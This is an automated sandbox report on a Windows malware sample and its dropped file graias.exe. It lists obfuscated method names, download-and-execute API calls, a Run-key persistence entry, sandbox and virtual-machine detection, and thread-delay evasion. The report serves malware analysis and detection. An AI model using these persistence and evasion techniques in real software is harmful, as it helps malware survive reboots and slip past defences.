                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, tEdNnMhdKHTbHQJoVm.csHigh entropy of concatenated method names: 'Gq7IT2NZHb', 'ltmIW0mRqy', 'DBoIhoCgwh', 'pE0Ij51JqK', 'mNpIV7k43K', 'Q4NIuFl2o8', 'Y37IeN6Ojp', 'rtRI3rsCam', 'H2xINubJte', 'uVFIrTSUCR'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, X8yytkHu8Bt1Puv27C.csHigh entropy of concatenated method names: 'b3rthX3x6', 'XvD71dNM5', 'nsrSV6jgQ', 'ckmvFVKmh', 'KNXL7DoN3', 'SNFXRtKA9', 'm1UPrMjudABTcAeQdC', 'ROeEnGwqnr0vnvXW64', 'oL6gqcnLb', 'Jd5ir5J6E'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, lYEfDODVqWlx3E11Q7.csHigh entropy of concatenated method names: 'LmrbZAovvH', 'SAdbVbiVyL', 'Ac2busbPge', 'AQCbe6rNkP', 'rN6b3pBW4s', 'Xp1bNK4Qlj', 'NtBbrupSXv', 'Oirbm8EG1p', 'FMMbG2N9R5', 'M9dbTB7Guj'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, oeCGxP9hPhHPGyyRta.csHigh entropy of concatenated method names: 'gSSsdqGo6G', 'TBwso4h8y4', 'zoog03AtDp', 'eM4g1nnf9E', 'D6RspcoAxE', 'r18sWR0yaW', 'AZ7sOJUllt', 'FDcshYvoM7', 'PMUsjKT1fg', 'w0qsqMSvAD'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, l7uwjVkLYhaEET5eZg.csHigh entropy of concatenated method names: 'NOPbISmEgt', 'SqEbsaGFuc', 'ydEbbUTwDy', 'yQnbA06cqO', 'weVbMNqY8Z', 'dheb4Dn24b', 'Dispose', 'xprgFKONB6', 'D2hgYS5HIO', 'ePwg5uZIof'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, YHIc1t1agveHGox9DlV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FeJ8bLFk34', 'jBp8iI1EXi', 'TLF8AYB7lO', 'MvX88XLL9T', 'uYE8MjLSpx', 'GUK8l9Oiuc', 'KFa84hWtwZ'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, o8MKfyrc7cYmq4eBVV.csHigh entropy of concatenated method names: 'h3qcFprRJn', 'K88c5beY6q', 'UK3cCfNcyZ', 'YQeCoeDoyO', 'KlZCzgpIw6', 'lW4c05FZuf', 'nNhc1DSxVO', 'NiXcHQX0ae', 'ps3cf7Eoys', 'Qywcaj27OC'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, lrQBfVV0rfHwgJoiLc.csHigh entropy of concatenated method names: 'QxRD9x24HcpebWts3CO', 'zUuf1R2QGuCeiVxJAeX', 'oI2vLD2N9ki0sTnF8PY', 'MgGCgSkenW', 'XO1CbdnCJC', 'Fq7Ci4HLLp', 'G1Ziwk2oXKuyB5fhbHT', 'Vh3KG12FCYQHR4jRI22'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, gT1bvP5O25dwYsGRwM.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nw9HDdlXL2', 'wsLHoweiE9', 'p0ZHzaHnLQ', 'qUIf0i2bSK', 'vLff1k8hbP', 'q3bfHlOdCo', 'llhff7qIuu', 'CjGF87HPXZBAxrLWIub'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, KsWaPvY6iMkFaFMqkR.csHigh entropy of concatenated method names: 'Dispose', 'RaE1DET5eZ', 'mFiHVS7Nkf', 'tOv8Sfr0Bu', 'rmX1opAG1K', 'huw1zye41K', 'ProcessDialogKey', 'HHBH0YEfDO', 'HqWH1lx3E1', 'bQ7HHXoIey'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, ISax0UGT6r9T28RYAO.csHigh entropy of concatenated method names: 'I3fc2i9nvL', 'OnvcJAeYSL', 'pr1ct6ebDa', 'qL1c7FVf1B', 'qKccE2CF6V', 'amtcS3XqdL', 'RWjcvsXoa4', 'wK0cQna2hg', 'GCYcLCexat', 'Cc0cXwYLbv'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, TcFXyGaNoLGVFHtkq0.csHigh entropy of concatenated method names: 'mEI1cirEpT', 'V4A1KEyLHD', 'HXf1xq0PeF', 'qWs163UEQb', 'zSr1IiPy3h', 'YAF1ytn9ui', 'ptWT28AKfgnuTGOjHu', 'BiBBHQ6UxLYlWm4UAX', 'FLv11ZCRg4', 'R4M1fDx9FU'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, GY0wQ6K1nUpCqMVFnw.csHigh entropy of concatenated method names: 'AEPfnHer6t', 'MJdfFJEvup', 'ITBfYKTtEy', 'S0Of50C1uj', 'Y0BfPWq66m', 'FNdfCFDKDl', 'iUQfcExu0H', 'rg2fKMehIO', 'LPhfB3Du4t', 'pFrfxTUOys'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, oirEpTQk4AEyLHDkvV.csHigh entropy of concatenated method names: 'C6FYh5MNiq', 'IvvYjTrBxL', 'BoMYqYVEHh', 'uq2YwAjpuj', 'yPpYU6Sew4', 'TX4Y9Sy8gm', 'kq2YkOH4Yl', 'fvEYdNOwUg', 'ttOYDkNP0y', 'LcQYotSVrQ'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, yUNEYV11fRq26bsPudC.csHigh entropy of concatenated method names: 'JLLioc94EI', 'BJLizcnH2u', 'lEvA0PirD8', 'kuoA1PDOH0', 'omBAHBdKdB', 'LesAfV7dU5', 'GIRAaUBJ1x', 'FTOAnIOJbV', 'kMoAFARjRR', 'v9FAYndEnU'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, FoIey2oob8woPkHgxe.csHigh entropy of concatenated method names: 'juYi5KlJ4i', 'o44iPVpbMV', 'DypiChV5u1', 'vwyicqyw8t', 'HZpibCdgkO', 'cwRiK7jLE5', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, CXF3dbOvOPd1Ho0I5P.csHigh entropy of concatenated method names: 'cOTRQv66sl', 'fccRLw4QQn', 'bB6RZfcJDN', 'iTTRV6CaSh', 'FCwRernfdH', 'KuQR3OTIM1', 'nfBRr5vONF', 'TjORmGPuGD', 'KMlRTyU85x', 'XGwRpNyUY5'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, TEQbsVXqVBlwj7SriP.csHigh entropy of concatenated method names: 'ornPE5vnCX', 'Qo8Pvcr1au', 'GWL5uYa3Ia', 'l0q5ee8Rc5', 'OkX53gJkgf', 'LP35NU6DtG', 'OHD5r4vvO1', 'UGD5muM35A', 'lqr5Gg37Ig', 'uGf5TxxuY4'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, sL6QMr10ElDaIL5m1Yb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eRaipbQLj5', 'KWUiWopZwi', 'z8biOwmQ67', 'PU2ih0QFUf', 'qHIijc2vau', 'Bauiqcjc3W', 'EP7iwYeWVW'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, CFmuHgz2uGmCodnc7W.csHigh entropy of concatenated method names: 'YAIiS0arfP', 'OC5iQfi9dn', 'WQdiLj9wO0', 'tJZiZveKka', 'VYHiVIm9v9', 'nAnieNam4i', 'JPoi3idXG7', 'KXti4fK9hA', 'xIUi26yaed', 'xhdiJ6vNHR'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, p3hoAFZtn9uiwEtfKN.csHigh entropy of concatenated method names: 'RNXCnJGTyk', 'QHECYGqyOs', 'ar6CPcoWNM', 'zHYCc0nWBF', 'LKaCKwrj56', 'oIkPU9ZU0L', 'hESP9O2J0K', 'arbPkqvrC7', 'dg8Pdx294o', 'c9PPDwQO1B'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, gyjADuLXfq0PeFsWs3.csHigh entropy of concatenated method names: 'qXa57AUKsP', 'X8b5SX3S8P', 'D4e5Qui8rs', 'qal5LYEuXZ', 'YZS5IM8QUF', 'coY5yLO0Ck', 'Dji5sJRCEC', 'Swn5gU3Y1B', 'mSx5bjF3qG', 'tuT5ioAkbN'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, tkV5WJwR3JlKYuw1Ej.csHigh entropy of concatenated method names: 'i13sxxg6ye', 'UAVs6J3jGf', 'ToString', 'dbasFI3BwU', 'rinsYdeWB0', 'Tf5s5mM5S2', 'MjjsPa6l1u', 'zLosCVjQIU', 'pyBscPQmod', 'YMYsKVQPUq'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, kwsnHd3D9pAL148Rf1.csHigh entropy of concatenated method names: 'Ww7Cr9HDP4', 'JyXCGflTi1', 'o9bCNt1ek6', 'P6vF0u2qBx4QxnA3ypc', 'sBToKX2sXGUnADsyPYF', 'vn1peu2JbdLT0xPgfWw', 'aBU0bj25uZPwellOY9b'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, gytIsVqF8MuD80NBw2.csHigh entropy of concatenated method names: 'ToString', 'B3ZypCGBEI', 'UR8yV8hA2f', 's8dyuu4h7x', 'Y0ZyeegDkT', 'KViy3klWnG', 'qrayNtstaX', 'C78yr3tCcQ', 'N3TymAgHAG', 'lQiyGZ8aVf'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, tEdNnMhdKHTbHQJoVm.csHigh entropy of concatenated method names: 'Gq7IT2NZHb', 'ltmIW0mRqy', 'DBoIhoCgwh', 'pE0Ij51JqK', 'mNpIV7k43K', 'Q4NIuFl2o8', 'Y37IeN6Ojp', 'rtRI3rsCam', 'H2xINubJte', 'uVFIrTSUCR'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, X8yytkHu8Bt1Puv27C.csHigh entropy of concatenated method names: 'b3rthX3x6', 'XvD71dNM5', 'nsrSV6jgQ', 'ckmvFVKmh', 'KNXL7DoN3', 'SNFXRtKA9', 'm1UPrMjudABTcAeQdC', 'ROeEnGwqnr0vnvXW64', 'oL6gqcnLb', 'Jd5ir5J6E'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, lYEfDODVqWlx3E11Q7.csHigh entropy of concatenated method names: 'LmrbZAovvH', 'SAdbVbiVyL', 'Ac2busbPge', 'AQCbe6rNkP', 'rN6b3pBW4s', 'Xp1bNK4Qlj', 'NtBbrupSXv', 'Oirbm8EG1p', 'FMMbG2N9R5', 'M9dbTB7Guj'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, oeCGxP9hPhHPGyyRta.csHigh entropy of concatenated method names: 'gSSsdqGo6G', 'TBwso4h8y4', 'zoog03AtDp', 'eM4g1nnf9E', 'D6RspcoAxE', 'r18sWR0yaW', 'AZ7sOJUllt', 'FDcshYvoM7', 'PMUsjKT1fg', 'w0qsqMSvAD'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, l7uwjVkLYhaEET5eZg.csHigh entropy of concatenated method names: 'NOPbISmEgt', 'SqEbsaGFuc', 'ydEbbUTwDy', 'yQnbA06cqO', 'weVbMNqY8Z', 'dheb4Dn24b', 'Dispose', 'xprgFKONB6', 'D2hgYS5HIO', 'ePwg5uZIof'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, YHIc1t1agveHGox9DlV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FeJ8bLFk34', 'jBp8iI1EXi', 'TLF8AYB7lO', 'MvX88XLL9T', 'uYE8MjLSpx', 'GUK8l9Oiuc', 'KFa84hWtwZ'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, o8MKfyrc7cYmq4eBVV.csHigh entropy of concatenated method names: 'h3qcFprRJn', 'K88c5beY6q', 'UK3cCfNcyZ', 'YQeCoeDoyO', 'KlZCzgpIw6', 'lW4c05FZuf', 'nNhc1DSxVO', 'NiXcHQX0ae', 'ps3cf7Eoys', 'Qywcaj27OC'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, lrQBfVV0rfHwgJoiLc.csHigh entropy of concatenated method names: 'QxRD9x24HcpebWts3CO', 'zUuf1R2QGuCeiVxJAeX', 'oI2vLD2N9ki0sTnF8PY', 'MgGCgSkenW', 'XO1CbdnCJC', 'Fq7Ci4HLLp', 'G1Ziwk2oXKuyB5fhbHT', 'Vh3KG12FCYQHR4jRI22'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, gT1bvP5O25dwYsGRwM.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nw9HDdlXL2', 'wsLHoweiE9', 'p0ZHzaHnLQ', 'qUIf0i2bSK', 'vLff1k8hbP', 'q3bfHlOdCo', 'llhff7qIuu', 'CjGF87HPXZBAxrLWIub'
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00406128 ShellExecuteW,URLDownloadToFileW, 5_2_00406128
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe File created: C:\Users\user\AppData\Roaming\Graias\graias.exe

                Boot Survival

                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-O844B9
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 5_2_00419BD4

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,5_2_0041BCF3
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\dxdiag.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: graias.exe PID: 6620, type: MEMORYSTR
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0040E54F Sleep,ExitProcess
                Source: C:\Windows\SysWOW64\dxdiag.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} WHERE ResultClass = Win32_DiskDrive
                Source: C:\Windows\SysWOW64\dxdiag.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
                Source: C:\Windows\SysWOW64\dxdiag.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk Where DriveType=3
                Source: C:\Windows\SysWOW64\dxdiag.exe System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Memory allocated: 12C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Memory allocated: 3140000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Memory allocated: 2F40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Memory allocated: 9680000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Memory allocated: A680000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Memory allocated: A890000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Memory allocated: B890000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Memory allocated: E50000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Memory allocated: 2B70000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Memory allocated: ED0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Memory allocated: 8BD0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Memory allocated: 9BD0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Memory allocated: 9DD0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Memory allocated: ADD0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 38_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_004198D2 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5563
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 408
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6046
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1579
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Window / User API: threadDelayed 8756
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Evaded block: after key decision (graph_5-47121)
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Evaded block: after key decision (graph_5-47097)
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Evaded block: after key decision (graph_5-47101)
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe API coverage: 5.8 %
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe API coverage: 9.5 %
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe TID: 7040 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6408 Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7116 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe TID: 4304 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332 Thread sleep count: 6046 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7468 Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316 Thread sleep count: 1579 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7396 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe TID: 7236 Thread sleep time: -26268000s >= -30000s
                Source: C:\Windows\SysWOW64\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\SysWOW64\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Windows\SysWOW64\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00406AC2 FindFirstFileW,FindNextFileW
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 8_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 38_2_0040AE51 FindFirstFileW,FindNextFileW
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 39_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 41_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 38_2_00418981 memset,GetSystemInfo
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe File opened: C:\Users\user\AppData\Roaming
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe File opened: C:\Users\user
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe File opened: C:\Users\user\AppData
                Source: svchost.exe, 0000002C.00000002.2207078230.0000000002A3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: graias.exe, 00000006.00000002.1731190562.0000000006BE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: svchost.exe, 00000016.00000002.1908700310.000000000323F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:s
                Source: graias.exe, 00000006.00000002.1731190562.0000000006BE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\C#
                Source: graias.exe, 00000008.00000002.2395821295.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, graias.exe, 00000008.00000002.2395821295.000000000125A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000038.00000002.2367956151.000000000343F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: svchost.exe, 00000033.00000002.2284798507.000000000343F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: graias.exe, 00000006.00000002.1731190562.0000000006BE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}3
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe API call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 38_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
